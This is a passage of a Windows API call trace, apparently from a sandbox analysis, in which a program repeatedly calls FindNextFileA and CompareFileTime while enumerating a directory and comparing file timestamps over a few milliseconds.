1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.915] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.915] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.916] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.916] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.917] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.917] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.918] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.918] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.919] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.919] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned 1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.920] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.920] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.921] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.921] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 